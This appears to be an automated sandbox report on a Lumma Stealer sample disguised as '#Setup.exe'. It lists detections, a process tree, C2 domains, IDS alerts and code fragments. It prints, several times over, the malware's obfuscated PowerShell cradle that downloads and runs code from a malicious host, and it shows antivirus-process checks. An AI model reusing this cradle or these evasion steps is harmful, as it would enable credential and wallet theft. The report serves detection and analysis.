Edit tour

Windows Analysis Report
#Setup.exe

Overview

General Information

Sample name:	#Setup.exe
Analysis ID:	1582494
MD5:	87186256e55365349fa7fc41c9f1c913
SHA1:	746ca2cf44c28df9aa492affc3c9481eaee07613
SHA256:	00e55ba929dc1832e8a3c987aaa9b3ef958742200faec9530e65b42960bb454a
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample or dropped binary is a compiled AutoHotkey binary

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

#Setup.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\#Setup.exe" MD5: 87186256E55365349FA7FC41C9F1C913)

powershell.exe (PID: 2356 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EZLBPQ4AXUTIKRAZAYNGFI8TD.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)

EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp (PID: 4440 cmdline: "C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$2043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)

EZLBPQ4AXUTIKRAZAYNGFI8TD.exe (PID: 6832 cmdline: "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)

EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp (PID: 4388 cmdline: "C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$3043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)

timeout.exe (PID: 4548 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)

conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3992 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1924 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6840 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6276 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6140 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 4232 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 4200 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2132 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 340 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 4440 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5260 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2704 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5872 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 1944 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1592 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2896 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

BrightLib.exe (PID: 1540 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)

conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4776 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6124 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["framekgirus.shop", "wholersorie.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "locketsashayz.click", "nearycrepso.shop"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4cfc1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: #Setup.exe PID: 2064	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: #Setup.exe PID: 2064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: #Setup.exe PID: 2064	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Setup.exe", ParentImage: C:\Users\user\Desktop\#Setup.exe, ParentProcessId: 2064, ParentProcessName: #Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2356, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Setup.exe", ParentImage: C:\Users\user\Desktop\#Setup.exe, ParentProcessId: 2064, ParentProcessName: #Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2356, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Setup.exe", ParentImage: C:\Users\user\Desktop\#Setup.exe, ParentProcessId: 2064, ParentProcessName: #Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2356, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Setup.exe", ParentImage: C:\Users\user\Desktop\#Setup.exe, ParentProcessId: 2064, ParentProcessName: #Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2356, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Setup.exe", ParentImage: C:\Users\user\Desktop\#Setup.exe, ParentProcessId: 2064, ParentProcessName: #Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2356, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:12.247463+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	188.114.97.3	443	TCP
2024-12-30T18:15:13.307398+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	188.114.97.3	443	TCP
2024-12-30T18:15:14.507520+0100	2028371	3	Unknown Traffic	192.168.2.6	49718	188.114.97.3	443	TCP
2024-12-30T18:15:15.751914+0100	2028371	3	Unknown Traffic	192.168.2.6	49729	188.114.97.3	443	TCP
2024-12-30T18:15:17.549102+0100	2028371	3	Unknown Traffic	192.168.2.6	49741	188.114.97.3	443	TCP
2024-12-30T18:15:19.131010+0100	2028371	3	Unknown Traffic	192.168.2.6	49752	188.114.97.3	443	TCP
2024-12-30T18:15:20.762853+0100	2028371	3	Unknown Traffic	192.168.2.6	49760	188.114.97.3	443	TCP
2024-12-30T18:15:22.722388+0100	2028371	3	Unknown Traffic	192.168.2.6	49777	188.114.97.3	443	TCP
2024-12-30T18:15:24.851453+0100	2028371	3	Unknown Traffic	192.168.2.6	49789	188.114.97.3	443	TCP
2024-12-30T18:15:26.101812+0100	2028371	3	Unknown Traffic	192.168.2.6	49800	185.161.251.21	443	TCP
2024-12-30T18:15:26.888524+0100	2028371	3	Unknown Traffic	192.168.2.6	49805	104.21.37.128	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:12.813965+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49710	188.114.97.3	443	TCP
2024-12-30T18:15:13.779479+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49712	188.114.97.3	443	TCP
2024-12-30T18:15:25.329675+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49789	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:12.813965+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49710	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:13.779479+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49712	188.114.97.3	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:27.338011+0100	2008438	1	A Network Trojan was detected	104.21.37.128	443	192.168.2.6	49805	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T18:15:20.167838+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49752	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipvumisui.shop/er	Avira URL Cloud: Label: malware
Source: https://cegu.shop/	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtrrF1Kye	Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compname=	Avira URL Cloud: Label: malware
Source: rabidcowse.shop	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtL	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/=	Avira URL Cloud: Label: malware
Source: cloudewahsj.shop	Avira URL Cloud: Label: malware
Source: nearycrepso.shop	Avira URL Cloud: Label: malware
Source: abruptyopsn.shop	Avira URL Cloud: Label: malware
Source: https://dfgh.online	Avira URL Cloud: Label: malware
Source: https://cegu.shop/u	Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=user-PC	Avira URL Cloud: Label: malware
Source: noisycuttej.shop	Avira URL Cloud: Label: malware
Source: wholersorie.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: #Setup.exe.2064.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "wholersorie.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "locketsashayz.click", "nearycrepso.shop"], "Build id": "hRjzG3--TRON"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe

ReversingLabs: Detection: 39%

Source: #Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.6:49805 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2376304733.0000000006F40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000002.2360275508.0000000000935000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000026.00000002.2956766226.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000026.00000002.2980993319.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BrightLib.exe, 00000026.00000002.2956766226.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000026.00000002.2980993319.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbXs< source: powershell.exe, 00000005.00000002.2377053357.0000000007008000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7585F4F6h]	0_2_0298E283
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_02968288
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+14h]	0_2_0296A20A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then jmp eax	0_2_0296622B
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 385488F2h	0_2_0297A384
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 31E2A9F4h	0_2_0298A384
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 4B1BF3DAh	0_2_0298A384
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_029543F4
